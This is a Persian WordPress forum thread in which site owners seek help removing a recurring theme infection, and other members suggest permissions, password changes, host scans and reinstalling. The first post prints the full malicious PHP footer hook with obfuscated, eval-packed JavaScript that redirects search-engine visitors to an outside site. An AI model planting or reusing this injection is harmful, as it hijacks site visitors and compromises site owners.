رفتن به مطلب

تروجان


eskafild

پست های پیشنهاد شده

سلام یه تروجان افتاده تو قالبم هی می پاکم بر میگرده چه کنم؟ورژن وردپرس رو هم ارتقاع دادم فایده نداد

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

لینک به ارسال

سلام دوست عزیز

احتمالا شل آپلود شده تو سایتتون. میتونین از مسئول هاستتون درخواست کنین در صورت امکان چک و فایل مخرب رو پیدا کنن. افزونه‌ی Threat Scan هم ممکنه مورد رو تشخیص بده.

حتما فایل wp-config.php رو به یک پوشه بالاتر از سطحی که وردپرس نصب شده منتقل کنین و پرمیژنش رو ۴۰۰ یا ۴۴۰ قرار بدین.

لینک به ارسال

در تکمیل حرف محسن عزیز

این یک redirector هست و تنها مشکلی که ایجاد میکنه استاپ شدن صفحه توسط آنتی ویروسهاست.

تغییر سطح دسترسی فایل wp-config.php بهترین گزینه خواهد بود.

لینک به ارسال

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

لینک به ارسال

در ادامه بحث

پرمیژن نوشتن را هم از فایل functions قالب بگیرید. => 400

لینک به ارسال

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.google.com/websearch/bin/answer.py?hl=en&answer=45449

این چی بید؟

لینک به ارسال

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

لینک به ارسال

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده ، حدود 8 روزه که من وردپرس رو بروز رسانی کرده ام.

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

لینک به ارسال

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

1. ابتدا کل سیستمتون رو با برنامه male ware byte اسکن کنید

2. پسورد FTP و Host رو تغییر بدین.

3. همانطور که مرتضی گفت، از گوگل وبمستر هم اقدام کنید.

فایرفاکس هم از دیتابیس گوگل برای تشخیص آلوده بودن سایت استفاده میکنه! سریعا باید اقدام کنید.

لینک به ارسال

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

سلام، شما هم میتونید این مراحل را طی کنید.

نیازی به حذف نیست!

البته این ویروس همیشه در دیتابیس جای میگیرد! یکسری کدمخرب هست و در بیشتر صفحات ظاهر میشود. دیتابیس را تعمیر و بهینه کنید مشکل رو حل میکند.

البته بعضی هاشون یک Table جداگونه برای این کار دارند D:

لینک به ارسال

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

به نظر من بهتره با پشتيباني هاست‌تون موضوع رو در ميان بزاريد ، اون‌ها با اسكنر‌هاي قوي خودشون هاست شما رو اسكن و از بد افزار خالي ميكنند ..

بعد اين هم طبق گفته‌ي آقا مصطفي عزيز تمامي پسورد‌ها رو عوض كنيد و مسائل امنيتي رو رعايت كنيد ..

لینک به ارسال

من همه ی کارهایی رو که گفتید انجام دادم

ولی هنوز گوگل همون خطا رو می ده و دیگه اینکه بعد از بروز رسانی وردپرس جفنگ زیاد نمی یومد . اما الان دوباره زیاد میاد

بیشتر مشکل هم تو افزونه exe-php که دارای تروجان هست. که یک افزونه بسیار کاربردی برای منه.

و تابع های eval() توی فایل های مختلف php وجود داره. که با Expolit scanner میزنم می گه که کدهای مخرب eval()

مثلا:wp-content/plugins/wp-jalali/inc/js/editjalali.js:1

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

باید چطوری این تابع های خطرناک رو حذف کرد و از دوباره ایجاد شدن این تابع ها در وردپرس جلوگیری کرد؟

لینک به ارسال

احتمال زیاد مشکل از سمت سرور شماست که آلوده شده.

اگر از سرور باشه شما خیلی نمیتونی کار خاصی انجام بدی و باید مدیر سرور پاکسازی انجام بده.

این کدی هم که دادین :

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

تکه ایی از یک بدافزار هست. و اینطور که گوگل آلرت میده بصورت وسیع روی سرور شما پخش شده.

لینک به ارسال

با نظر مرتضی موافقم! شما نمیتونید دقیقا بررسی کنید و تک تک فایل هارا ببینید. با میزبانی خود تماس بگیرید و از ایشون بخواهید که کلمه eval را در تمام فایل های شما سرچ کنید و نتیجه را به شما بدهد.

به این نکنه هم توجه کنید که بعد از پاکسازی تروجان، کمی زمان میبرد تا وب گاه شما در دسترسی قرار گیرد :)

لینک به ارسال

ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟

مربوط به چی هست؟!
لینک به ارسال

سلام به دوستان

با توجه به راهنمایی که کردید ، انجام دادم و الان اون خطا که در زیر وب سایتم در گوگل بود پاک شده و ورودی گوگل هم افزایش یافته

با تشکر فراوان از اساتید :lol:

لینک به ارسال

کد جاوااسکریپت هست.

باید در فایل header و قبلا از

</head>

قرار بدید.

یعنی داخل تگ head باشه.

لینک به ارسال
  • 1 ماه بعد...

سلام

میشه یه نگاه هم به وبسایت من بندازید؟

Pichgooshti.com

اصلا نمیتونم واردش بشم. هم مرورگر و هم ویروسیاب گیر میدن.

وارد سی پنل هم که میشم، مرورگر گیر میده و اصلا وارد فایل منیجر سی پنل نمیتونم بشم. خیلی وقته اینجوره (تقریبا دیگه از وبسایت هیچی نمونده).

لینک به ارسال

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

لینک به ارسال

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

ممنون

خب اصلا وقتش نبوده.

یعنی میفرمایید کل اطلاعاتش (یعنی بیش از 1000 تا پست) هم باید پاک بشه؟

ویرایش شده توسط pichgooshti
لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...